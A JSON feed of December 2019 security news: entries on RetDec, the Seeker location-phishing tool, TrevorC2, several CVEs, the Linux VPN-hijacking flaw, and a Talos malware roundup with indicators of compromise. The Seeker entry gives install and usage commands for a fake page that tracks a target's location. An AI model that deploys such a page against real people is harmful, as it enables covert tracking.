retdec-llvmir2hll ` ). \n * ` macho-extractortool ` \\- frontend for the ` macho-extractor ` library (installed as ` retdec-macho-extractor ` ). \n * ` pat2yara ` \\- tool for processing patterns to YARA signatures (installed as ` retdec-pat2yara ` ). \n * ` stacofintool ` \\- frontend for the ` stacofin ` library (installed as ` retdec-stacofin ` ). \n * ` unpackertool ` \\- plugin-based unpacker (installed as ` retdec-unpacker ` ). \nThis repository contains the following scripts: \n\n\n * ` retdec-decompiler.py ` \\- the main decompilation script binding it all together. This is the tool to use for full binary-to-C decompilations. \n * Support scripts used by ` retdec-decompiler.py ` : \n * ` retdec-color-c.py ` \\- decorates output C sources with IDA color tags - syntax highlighting for IDA. \n * ` retdec-config.py ` \\- decompiler's configuration file. \n * ` retdec-archive-decompiler.py ` \\- decompiles objects in the given AR archive. \n * ` retdec-fileinfo.py ` \\- a Fileinfo tool wrapper. \n * ` retdec-signature-from-library-creator.py ` \\- extracts function signatures from the given library. \n * ` retdec-unpacker.py ` \\- tries to unpack the given executable file by using any of the supported unpackers. \n * ` retdec-utils.py ` \\- a collection of Python utilities. \n * ` retdec-tests-runner.py ` \\- run all tests in the unit test directory. \n * ` type_extractor ` \\- generation of type information (for internal use only) \n \n** Project Documentation ** \nSee the [ project documentation ](<https://retdec-tc.avast.com/repository/download/Retdec_DoxygenBuild/.lastSuccessful/build/doc/doxygen/html/index.html?guest=1> \"project documentation\" ) for an up to date Doxygen-generated software reference corresponding to the latest commit in the ` master ` branch. \n \n** Related Repositories ** \n\n\n * [ retdec-idaplugin ](<https://github.com/avast/retdec-idaplugin> \"retdec-idaplugin\" ) \\-- Embeds RetDec into IDA (Interactive Disassembler) and makes its use much easier. \n * [ retdec-regression-tests-framework ](<https://github.com/avast/retdec-regression-tests-framework> \"retdec-regression-tests-framework\" ) \\-- A framework for writing and running regression tests for RetDec and related tools. This is a must if you plan to contribute to the RetDec project. \n * [ retdec-regression-tests ](<https://github.com/avast/retdec-regression-tests> \"retdec-regression-tests\" ) \\-- A suite of regression tests for RetDec and related tools. \n * [ vim-syntax-retdecdsm ](<https://github.com/s3rvac/vim-syntax-retdecdsm> \"vim-syntax-retdecdsm\" ) \\-- Vim syntax-highlighting file for the output from the RetDec's [ disassembler ](<https://www.kitploit.com/search/label/Disassembler> \"disassembler\" ) ( ` .dsm ` files). \n \n** License ** \nCopyright (c) 2017 Avast Software, licensed under the MIT license. See the [ ` LICENSE ` ](<https://github.com/avast/retdec/blob/master/LICENSE> \"RetDec is a retargetable machine-code decompiler based on LLVM. \\(83\\)\" ) file for more details. \nRetDec uses third-party libraries or other resources listed, along with their licenses, in the [ ` LICENSE-THIRD-PARTY ` ](<https://github.com/avast/retdec/blob/master/LICENSE-THIRD-PARTY> \"RetDec is a retargetable machine-code decompiler based on LLVM. \\(84\\)\" ) file. \n \n** Contributing ** \nSee [ RetDec contribution guidelines ](<https://github.com/avast/retdec/wiki/Contribution-Guidelines> \"RetDec contribution guidelines\" ) . \n \n** Acknowledgements ** \nThis software was supported by the research funding TACR (Technology Agency of the Czech Republic), ALFA Programme No. TA01010667. \n \n \n\n\n** [ Download Retdec ](<https://github.com/avast/retdec> \"Download Retdec\" ) **\n", "modified": "2019-12-06T19:50:05", "published": "2019-12-06T19:50:05", "id": "KITPLOIT:2088998605550034810", "href": "http://www.kitploit.com/2019/12/retdec-retargetable-machine-code.html", "title": "RetDec - A Retargetable Machine-Code Decompiler Based On LLVM", "type": "kitploit", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-12-06T15:28:32", "bulletinFamily": "tools", "description": "[  ](<https://1.bp.blogspot.com/-13mDu2RJfxQ/XemUDd7b0VI/AAAAAAAARBc/cJ3brE37QJQRcm8JuQx39JorrImbB_rAwCNcBGAsYHQ/s1600/seeker_1.png>)\n\n \n\n\nConcept behind Seeker is simple, just like we host phishing pages to get [ credentials ](<https://www.kitploit.com/search/label/Credentials> \"credentials\" ) why not host a fake page that requests your location like many popular location based websites. Read more on [ thewhiteh4t's Blog ](<https://thewhiteh4t.github.io/> \" thewhiteh4t's Blog \" ) .Seeker Hosts a fake website on ** In Built PHP Server ** and uses ** Serveo ** to generate a link which we will forward to the target, website asks for Location Permission and if the target allows it, we can get : \n\n\n * Longitude \n * Latitude \n * Accuracy \n * Altitude - Not always available \n * Direction - Only available if user is moving \n * Speed - Only available if user is moving \nAlong with Location Information we also get ** Device Information ** without any permissions : \n\n\n * Operating System \n * Platform \n * Number of CPU Cores \n * Amount of RAM - Approximate Results \n * Screen Resolution \n * GPU information \n * Browser Name and Version \n * Public IP Address \n * IP Address Reconnaissance \n** This tool is a Proof of Concept and is for Educational Purposes Only, Seeker shows what data a malicious website can gather about you and your devices and why you should not click on random links and allow critical permissions such as Location etc. ** \n \n** How is this Different from IP GeoLocation ** \n\n\n * Other tools and services offer IP [ Geolocation ](<https://www.kitploit.com/search/label/Geolocation> \"Geolocation\" ) which is NOT accurate at all and does not give location of the target instead it is the approximate location of the ISP. \n\n * Seeker uses HTML API and gets Location Permission and then grabs [ Longitude ](<https://www.kitploit.com/search/label/Longitude> \"Longitude\" ) and Latitude using GPS Hardware which is present in the device, so Seeker works best with Smartphones, if the GPS Hardware is not present, such as on a Laptop, Seeker fallbacks to IP Geolocation or it will look for Cached Coordinates. \n\n * Generally if a user accepts location permsission, Accuracy of the information recieved is ** accurate to approximately 30 meters ** , Accuracy Depends on the Device. \n\n** Note ** : On iPhone due to some reason location accuracy is approximately 65 meters. \n \n** Templates ** \nYou can choose a template which will be used by seeker from these : \n\n\n * NearYou \n * Google Drive (Suggested by @Akaal_no_one) \n \n** Tested On : ** \n\n\n * Kali Linux 2019.2 \n * BlackArch Linux \n * Ubuntu 19.04 \n * Kali Nethunter \n * Termux \n * Parrot OS \n \n** Installation ** \n \n** Kali Linux / Ubuntu / Parrot OS ** \n\n \n \n git clone https://github.com/thewhiteh4t/seeker.git\n cd seeker/\n chmod 777 install.sh\n ./install.sh\n\n \n** BlackArch Linux ** \n\n \n \n pacman -S seeker\n\n \n** Docker ** \n\n \n \n docker pull thewhiteh4t/seeker\n\n \n** Termux ** \n\n \n \n git clone https://github.com/thewhiteh4t/seeker.git\n cd seeker/\n chmod 777 termux_install.sh\n ./termux_install.sh\n\n \n** Usage ** \n\n \n \n python3 seeker.py -h\n \n usage: seeker.py [-h] [-s SUBDOMAIN]\n \n optional arguments:\n -h, --help show this help message and exit\n -s SUBDOMAIN, --subdomain Subdomain Provide Subdomain for Serveo URL ( Optional )\n -k KML, --kml KML Provide KML Filename ( Optional )\n -t TUNNEL, --tunnel TUNNEL Specify Tunnel Mode [manual]\n \n # Example\n \n # SERVEO \n ########\n python3 seeker.py\n \n # NGROK ETC.\n ############\n \n # In First Terminal Start seeker in Manual mode like this\n python3 seeker.py -t manual\n \n # In Second Terminal Start Ngrok or any other tunnel service on port 8080\n ./ngrok http 8080\n \n #-----------------------------------#\n \n # Subdomain\n ########### \n python3 seeker.py --subdomain google\n python3 seeker.py -- tunnel manual --subdomain zomato\n \n #-----------------------------------#\n \n # Docker Usage\n ##############\n \n # SERVEO\n ########\n docker run -t --rm thewhiteh4t/seeker\n \n # NGROK\n #######\n \n # Step 1\n docker network create ngroknet\n \n # Step 2\n docker run --rm -t --net ngroknet --name seeker thewhiteh4t/seeker python3 seeker.py -t manual\n \n # Step 3\n docker run --rm -t --net ngroknet --name ngrok wernight/ngrok ngrok http seeker:8080\n\n \n** Known Problems ** \n\n\n * Services like Serveo and Ngrok are banned in some countries such as Russia etc., so if it's banned in your country you may not get a URL, if not then first READ CLOSED ISSUES, if your problem is not listed, create a new issue. \n \n** Demo ** \n\n\n \n\n\n \n \n\n\n** [ Download Seeker ](<https://github.com/thewhiteh4t/seeker> \"Download Seeker\" ) **\n", "modified": "2019-12-06T11:00:03", "published": "2019-12-06T11:00:03", "id": "KITPLOIT:4428111869942471510", "href": "http://www.kitploit.com/2019/12/seeker-v121-accurately-locate.html", "title": "Seeker v1.2.1 - Accurately Locate Smartphones Using Social Engineering", "type": "kitploit", "cvss": {"score": 0.0, "vector": "NONE"}}], "pentestit": [{"lastseen": "2019-12-07T02:00:40", "bulletinFamily": "blog", "description": "TrevorC2 version 1.3 was just released yesterday! I briefly mentioned about TrevorC2 in my older post titled as the List of Open Source C2 Post-Exploitation Frameworks. Infact, there have been two updates which I missed blogging about and hence, this post will cover those changes as well. What is TrevorC2? TrevorC2 is a an open source client/server model for masking command and control through a...\n\n[Source](<http://pentestit.com/update-trevorc2-version-1-3/>)", "modified": "2019-12-06T23:39:09", "published": "2019-12-06T23:39:09", "id": "PENTESTIT:C07434AD14CDB0290959D901963FBA09", "href": "http://pentestit.com/update-trevorc2-version-1-3/", "type": "pentestit", "title": "UPDATE: TrevorC2 version 1.3", "cvss": {"score": 0.0, "vector": "NONE"}}], "cve": [{"lastseen": "2019-12-07T12:53:51", "bulletinFamily": "NVD", "description": "In device_class_to_int of device_class.cc, there is a possible out of bounds read due to improper casting. This could lead to local information disclosure in the Bluetooth server with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-8.0 Android-8.1 Android-9 Android-10Android ID: A-140152619", "modified": "2019-12-07T03:04:00", "id": "CVE-2019-2226", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-2226", "published": "2019-12-06T23:15:00", "title": "CVE-2019-2226", "type": "cve", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-12-07T12:53:48", "bulletinFamily": "NVD", "description": "Insufficient checks in the finite state machine of the ShapeShift KeepKey hardware wallet before firmware 6.2.2 allow a partial reset of cryptographic secrets to known values via crafted messages. Notably, this breaks the security of U2F for new server registrations and invalidates existing registrations. This vulnerability can be exploited by unauthenticated attackers and the interface is reachable via WebUSB.", "modified": "2019-12-06T19:03:00", "id": "CVE-2019-18672", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-18672", "published": "2019-12-06T18:15:00", "title": "CVE-2019-18672", "type": "cve", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-12-07T11:53:43", "bulletinFamily": "NVD", "description": "beegfs-ctl in ThinkParQ BeeGFS through 7.1.3 allows Authentication Bypass via communication with a BeeGFS metadata server (which is typically not exposed to external networks).", "modified": "2019-12-05T16:27:00", "id": "CVE-2019-15897", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-15897", "published": "2019-12-05T16:15:00", "title": "CVE-2019-15897", "type": "cve", "cvss": {"score": 0.0, "vector": "NONE"}}], "threatpost": [{"lastseen": "2019-12-06T17:02:13", "bulletinFamily": "info", "description": "A vulnerability in most Linux distros has been uncovered that allows a network-adjacent attacker to hijack VPN connections and inject rogue data into the secure tunnels that victims are using to communicate with remote servers.\n\nAccording to researchers at University of New Mexico and Breakpointing Bad, the bug (CVE-2019-14899), \u201callows\u2026an attacker to determine if\u2026a user is connected to a VPN, the virtual IP address they have been assigned by the VPN server, and whether or not there is an active connection to a given website.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nIn [an advisory](<https://seclists.org/oss-sec/2019/q4/122>) released this week, they noted that once a proof-of-concept exploit allowed them to determine a VPN client\u2019s virtual IP address and make inferences about active connections, they were then able to use encrypted replies to unsolicited packets to determine the sequence and acknowledgment numbers of connections. These allowed them to hijack TCP sessions and inject data into the TCP stream.\n\n## Anatomy of an Attack\n\nAn attack would require convincing a user to connect to a rogue wireless access point (or other internet connection) under the adversary\u2019s control (imagine a coffee shop scenario, for instance). The attacker can then start scanning devices connected to the access point for active VPN sessions.\n\nTo do this, the access point can send SYN-ACK packets to any connected devices, canvassing across the entire virtual IP space. When a SYN-ACK is sent to the correct virtual IP on the victim device, the device responds; when the SYN-ACK is sent to the incorrect virtual IP, nothing is received by the attacker. An automated script would presumably make this process painless for the adversary.\n\nOnce the attacker determines that the user has an active TCP connection to an external server, the next step is to sniff out the next sequence number and in-window acknowledgment number needed to inject forged packets into the connection.\n\nTo find the appropriate sequence and ACK numbers, the attacker can continually spoof reset packets into the active connection until it sniffs challenge ACKs.\n\n\u201cThe victim\u2019s device will trigger a TCP challenge ACK on each reset it receives that has an in-window sequence number for an existing connection,\u201d according to the advisory. \u201cFor example, if the client is using OpenVPN to exchange encrypted packets with the VPN server, then the client will always respond with an SSL packet of length 79 when a challenge ACK is triggered.\u201d\n\nContinuing with packet-spoofing and challenge ACK analysis (detailed in the advisory), an attacker can infer the rest of the information needed to inject arbitrary payloads into the victim\u2019s active VPN session.\n\n## Affected OS and VPNs\n\nThe bug affects macOS, iOS and Android, most Linux distributions including Ubuntu, Fedora and Debian, as well as Unix-like OS such as FreeBSD and OpenBSD. At particular risk are those Linux distros that use a version of systemd pulled after November 28 of last year, which turned reverse path filtering off, researchers warned. The IPv4 version of CentOS has been confirmed as unaffected.\n\nAs for VPN technology, researchers found that a proof-of-concept exploit works against OpenVPN, WireGuard and IKEv2/IPSec, and they\u2019re in the process of testing Tor.\n\n\u201cThe VPN technology used does not seem to matter and we are able to make all of our inferences even though the responses from the victim are encrypted, using the size of the packets and number of packets sent (in the case of challenge ACKs, for example) to determine what kind of packets are being sent through the encrypted VPN tunnel,\u201d according to the advisory.\n\nThe bug has been reported to distros and the Linux kernel security team, as well as to others impacted such as Systemd, Google, Apple, OpenVPN, and WireGuard.\n\n\u201cAdding a prerouting rule to drop packets destined for the client\u2019s virtual IP address is an effective [mitigation] on some systems,\u201d according to the advisory. \u201cThere are other potential solutions being considered by the kernel maintainers, but I can\u2019t speak to their current status.\u201d\n\n[**Free Threatpost Webinar:**](<https://attendee.gotowebinar.com/register/7725318633369800449?source=art>) **_Risk around third-party vendors is real and can lead to data disasters. We rely on third-party vendors, but that doesn\u2019t mean forfeiting security. _**[**_Join us on Dec. 18th at 2 pm EST_**](<https://attendee.gotowebinar.com/register/7725318633369800449?source=art>)**_ as Threatpost looks at managing third-party relationship risks with industry experts Dr. Larry Ponemon, of Ponemon Institute; Harlan Carvey, with Digital Guardian and Flashpoint\u2019s Lance James. _**[**_Click here to register_**](<https://attendee.gotowebinar.com/register/7725318633369800449?source=art>)**_._**\n", "modified": "2019-12-06T16:54:02", "published": "2019-12-06T16:54:02", "id": "THREATPOST:C90531BC1E0B38F400111112E4CBEF3A", "href": "https://threatpost.com/linux-bug-vpns-hijacking/150891/", "type": "threatpost", "title": "Linux Bug Opens Most VPNs to Hijacking", "cvss": {"score": 0.0, "vector": "NONE"}}], "thn": [{"lastseen": "2019-12-06T12:33:52", "bulletinFamily": "info", "description": "[](<https://1.bp.blogspot.com/-WMkBOTVhvWY/Xeo0rDTtwyI/AAAAAAAA17s/FVhvLMEY1qs7YWBRRvq_YhwWs1uqQpxjwCLcBGAsYHQ/s728-e100/linux-vpn-hacking.jpg>)\n\nA team of cybersecurity researchers has disclosed a new severe vulnerability affecting most Linux and Unix-like operating systems, including FreeBSD, OpenBSD, macOS, iOS, and Android, that could allow remote 'network adjacent attackers' to spy on and tamper with encrypted VPN connections. \n \nThe vulnerability, tracked as CVE-2019-14899, resides in the networking stack of various operating systems and can be exploited against both IPv4 and IPv6 TCP streams. \n \nSince the vulnerability does not rely on the VPN technology used, the attack works against widely implemented virtual private network protocols like OpenVPN, WireGuard, IKEv2/IPSec, and more, the researchers confirmed. \n\n\n \nThis vulnerability can be exploited by a network attacker \u2014 controlling an access point or connected to the victim's network \u2014 just by sending unsolicited network packets to a targeted device and observing replies, even if they are encrypted. \n \nAs explained by the researchers, though there are variations for each of the impacted operating systems, the vulnerability allows attackers to: \n \n\n\n * determine the virtual IP address of a victim assigned by the VPN server,\n * determine if there is an active connection to a given website,\n * determine the exact seq and ack numbers by counting encrypted packets and/or examining their size, and\n * inject data into the TCP stream and hijack connections.\n \n\n\n> \"The access point can then determine the virtual IP of the victim by sending SYN-ACK packets to the victim device across the entire virtual IP space,\" the team said in its [advisory](<https://seclists.org/oss-sec/2019/q4/122>).\n\n \n\n\n> \"When a SYN-ACK is sent to the correct virtual IP on the victim device, the device responds with a RST; when the SYN-ACK is sent to the incorrect virtual IP, nothing is received by the attacker.\"\n\n \nWhile explaining variations in the behavior of different operating systems, as an example, researchers said the attack does not work against macOS/iOS devices as described. \n \nInstead, an attacker needs to \"use an open port on the Apple machine to determine the virtual IP address.\" In their testing, the researchers use \"port 5223, which is used for iCloud, iMessage, FaceTime, Game Center, Photo Stream, and push notifications, etc.\" \n\n\n[](<https://bit.ly/2nAQ7y5> \"Web Application Firewall\" )\n\n \nThe researchers tested and successfully exploited the vulnerability against the following operating systems and the init systems, but they believe this list could go long as researchers test the flaw on more systems. \n \n\n\n * Ubuntu 19.10 (systemd)\n * Fedora (systemd)\n * Debian 10.2 (systemd)\n * Arch 2019.05 (systemd)\n * Manjaro 18.1.1 (systemd)\n * Devuan (sysV init)\n * MX Linux 19 (Mepis+antiX)\n * Void Linux (runit)\n * Slackware 14.2 (rc.d) \n * Deepin (rc.d)\n * FreeBSD (rc.d) \n * OpenBSD (rc.d)\n \n\"Most of the Linux distributions we tested were vulnerable, especially Linux distributions that use a version of systemd pulled after November 28th of last year, which turned reverse path filtering off,\" the researchers said. \n \n\"However, we recently discovered that the attack also works against IPv6, so turning reverse path filtering on isn't a reasonable solution.\" \n \nAs possible mitigation, researchers suggested to turn on reverse path filtering, implement bogon filtering, and encrypt packet size and timing to prevent attackers from making any inference. \n \nWhile the researchers have not yet revealed technical details of the vulnerability, they are planning to publish an in-depth analysis of this flaw and its related implications, after affected vendors, including Systemd, Google, Apple, OpenVPN, WireGuard, and different Linux distros issue satisfactory workarounds and patches.\n", "modified": "2019-12-06T11:26:06", "published": "2019-12-06T11:02:00", "id": "THN:FD10C34E4C222666AC0DBB5533C900AF", "href": "https://thehackernews.com/2019/12/linux-vpn-hacking.html", "type": "thn", "title": "New Linux Bug Lets Attackers Hijack Encrypted VPN Connections", "cvss": {"score": 0.0, "vector": "NONE"}}], "talosblog": [{"lastseen": "2019-12-06T20:48:42", "bulletinFamily": "blog", "description": "[](<https://1.bp.blogspot.com/-YY2FQl9WGXA/XURYSq-inGI/AAAAAAAAACc/Ko8Q3jzMHrs2tIOdnt-yO6QVWhNtZBrPwCLcBGAs/s1600/recurring%2Bblog%2Bimages_threat%2Broundup.jpg>)\n\nToday, Talos is publishing a glimpse into the most prevalent threats we've observed between Nov. 29 and Dec. 6. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats. \n \nAs a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net. \n \nFor each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found [here](<https://alln-extcloud-storage.cisco.com/blogs/1/2019/12/tru.json_.txt>)that includes the complete list of file hashes, as well as all other IOCs from this post. As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicated maliciousness. \nThe most prevalent threats highlighted in this roundup are: \nThreat Name | Type | Description \n---|---|--- \nWin.Malware.NetWire-7428720-1 | Malware | NetWire is a remote access trojan (RAT) that allows attackers to execute commands on the infected host, log keystrokes, interact with a webcam, remote desktop, and read data from connected USB devices. NetWire is commonly delivered through Microsoft Office documents with macros, sent as attachments on malicious emails. \nWin.Ransomware.Cerber-7419509-0 | Ransomware | Cerber is ransomware that encrypts documents, photos, databases and other important files. Historically, this malware would replace files with encrypted versions and add the file extension \".cerber,\" although in more recent campaigns, this is no longer the case. \nWin.Trojan.LokiBot-7420275-1 | Trojan | Lokibot is an information-stealing malware designed to siphon off sensitive information stored on an infected device. It is modular in nature, supporting the ability to steal sensitive information from a number of popular applications. It is commonly pushed via malicious documents attached to spam emails. \nWin.Dropper.Gh0stRAT-7414189-0 | Dropper | Gh0stRAT is a well-known family of RATs designed to provide an attacker with complete control over an infected system. Capabilities include monitoring keystrokes, collecting video footage from the webcam, and uploading/executing follow-on malware. The source code for Gh0stRAT has been publicly available on the internet for years, significantly lowering the barrier for actors to modify and reuse the code in new attacks. \nWin.Trojan.Zbot-7414153-0 | Trojan | Zbot, also known as Zeus, is trojan that steals information such as banking credentials using methods like key-logging and form-grabbing. \nDoc.Downloader.Emotet-7413880-1 | Downloader | Emotet is a banking trojan that has remained relevant due to its continual evolution to better avoid detection. It is commonly spread via malicious emails. \nWin.Dropper.Tofsee-7431752-0 | Dropper | Tofsee is multi-purpose malware that features several modules that send spam messages, conduct click fraud, mine cryptocurrency and more. Infected systems become part of the Tofsee spam botnet and are used to send large volumes of spam messages to infect additional systems and increase the overall size of the botnet under the operator\u2019s control. \nWin.Downloader.Phorpiex-7428338-0 | Downloader | Phorpiex is a trojan and worm that infects machines to deliver follow-on malware. Phorpiex has been known to drop a wide range of payloads, from malware to send spam emails to ransomware and cryptocurrency miners. \n \n* * *\n\n## Threat Breakdown\n\n### Win.Malware.NetWire-7428720-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\NETWIRE ` | 14 \n`<HKCU>\\SOFTWARE\\NETWIRE \nValue Name: HostId ` | 14 \n`<HKCU>\\SOFTWARE\\NETWIRE \nValue Name: Install Date ` | 14 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\ACTIVE SETUP\\INSTALLED COMPONENTS\\{136PK353-UF88-3GCY-ILP2-6AY4D4SNW644} ` | 13 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: HKLM ` | 13 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\ACTIVE SETUP\\INSTALLED COMPONENTS\\{136PK353-UF88-3GCY-ILP2-6AY4D4SNW644} \nValue Name: StubPath ` | 13 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: MServices ` | 1 \nMutexes | Occurrences \n---|--- \n`Global\\<random guid>` | 16 \n`imDfesUY` | 13 \n`xtWSWREb` | 1 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`cobroserfinansa[.]com` | 14 \nFiles and or directories created | Occurrences \n---|--- \n`%APPDATA%\\Install` | 15 \n`%TEMP%\\<random, matching '[a-z]{4,9}'>.exe` | 15 \n`%APPDATA%\\Install\\winlogon.exe` | 14 \n`%TEMP%\\7176.dmp` | 1 \n`%APPDATA%\\Install\\MServicesNet.exe` | 1 \n`%TEMP%\\7134_appcompat.txt` | 1 \n \n#### File Hashes\n\n` 038157ed389233fc4aae039df0806789f2c92b6e3947f36bc8f086ae16a7fd4e 182dadc51371a709b901f1de489a52ff7295749427a8cf9d112358a605e2ed6d 33d4c44c967c9ab53f3d04b0d11ac38f9fbc3f9d16e65cca170bd8c937589038 3cf7e6a7776e15f8c01bde5788e5e7dbbe25beb37e977abe38b3b4cb256c3ec3 527ff73f2e6d99bbcc7fa02804ab7380e2fe12689b70bb1b0840ac1b02331a93 5aa45dcf729d53a3fc6e5d02980835fe78f3f7b7ae262b8aebf2edb6abb59bc4 5f86aa7181604fadc92f1a976fdfff892cd9b515e59939d93941907a35762888 6485a616654adee2d573a983c687a8d8ea3d126dfbf86df3a065c5e7846bd57b 7746199aba6ad47bf92515db686f3a5e2accbdb2b7f480ac2af1e2c5c377a8eb 79aa89119d9e26dc366a7af72d47c323168d2ad881bca31e9075a41f5ce081f2 905b2347215e7ce0f02f8e7274941982c56c1b817fbfd4b9eaf97d2a65f6146d 91856d29ac1f9720917a40e5533c7dacf528b25acfb5a82a00f6882b053c9b5a b18a45a4345f442efcc02d6efb9110b9e35bb98fac4613c83a39fecbee78aaa4 d26438798f502364eea85bbf2804165d0709b90833ddf4512f95ac77f881edaf de8be762d85eb4014992a174acd115de70b89884d21933d7e972e6d4972904fe def9d601134017c678cbd058f41b4ad7d3dd8d2c8ef1eef01a9a17ebf38ea6fa e0acbefe824d29143e303ba8596d1436150bf1ad7ec533b56e4ae2b1bafcf07f ea34a08deaac08c7f79e6cd2e94a74ad5b0c95dec43f81e0a218d957088b8f10 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-A71_xnIISqo/XeqM2bcnfDI/AAAAAAAAC8U/10U7Bp8vnh0OPPzEdrzVimUVUDijT6k9ACLcBGAsYHQ/s1600/def9d601134017c678cbd058f41b4ad7d3dd8d2c8ef1eef01a9a17ebf38ea6fa_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-mO63cFGuGWk/XeqM6B4wP5I/AAAAAAAAC8Y/D0XOfx3jnZkD7QkmWbImdcnFLyc1XagjACLcBGAsYHQ/s1600/def9d601134017c678cbd058f41b4ad7d3dd8d2c8ef1eef01a9a17ebf38ea6fa_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Ransomware.Cerber-7419509-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\BCD00000000\\OBJECTS\\{926583E4-EF64-11E4-BEED-D6738078AD98}\\ELEMENTS\\16000009 \nValue Name: Element ` | 12 \n`<HKLM>\\BCD00000000\\OBJECTS\\{926583E4-EF64-11E4-BEED-D6738078AD98}\\ELEMENTS\\250000E0 \nValue Name: Element ` | 12 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER \nValue Name: Run ` | 12 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\COMMAND PROCESSOR \nValue Name: AutoRun ` | 12 \n`<HKCU>\\CONTROL PANEL\\DESKTOP \nValue Name: SCRNSAVE.EXE ` | 12 \n`<HKCU>\\PRINTERS\\DEFAULTS\\{21A3D5EE-E123-244A-98A1-8E36C26EFF6D} ` | 12 \n`<HKCU>\\PRINTERS\\DEFAULTS ` | 12 \n`<HKLM>\\BCD00000000\\OBJECTS\\{926583E4-EF64-11E4-BEED-D6738078AD98}\\ELEMENTS\\250000E0 ` | 12 \n`<HKCU>\\PRINTERS\\DEFAULTS\\{21A3D5EE-E123-244A-98A1-8E36C26EFF6D} \nValue Name: Component_01 ` | 12 \n`<HKCU>\\PRINTERS\\DEFAULTS\\{21A3D5EE-E123-244A-98A1-8E36C26EFF6D} \nValue Name: Component_00 ` | 12 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: dnscacheugc ` | 2 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: dnscacheugc ` | 2 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: javaw ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: javaw ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: vssadmin ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: vssadmin ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: TCPSVCS ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: TCPSVCS ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: lodctr ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: lodctr ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: instnm ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: instnm ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: bootcfg ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: bootcfg ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: ctfmon ` | 1 \nMutexes | Occurrences \n---|--- \n`shell.{381828AA-8B28-3374-1B67-35680555C5EF}` | 12 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`216[.]239[.]38[.]21` | 4 \n`216[.]239[.]32[.]21` | 3 \n`216[.]239[.]36[.]21` | 3 \n`216[.]239[.]34[.]21` | 2 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`ipinfo[.]io` | 12 \nFiles and or directories created | Occurrences \n---|--- \n`%APPDATA%\\{6F885251-E36F-0FE6-9629-63208157D7A2}` | 12 \n`%System32%\\Tasks\\dnscacheugc` | 2 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\dnscacheugc.lnk` | 2 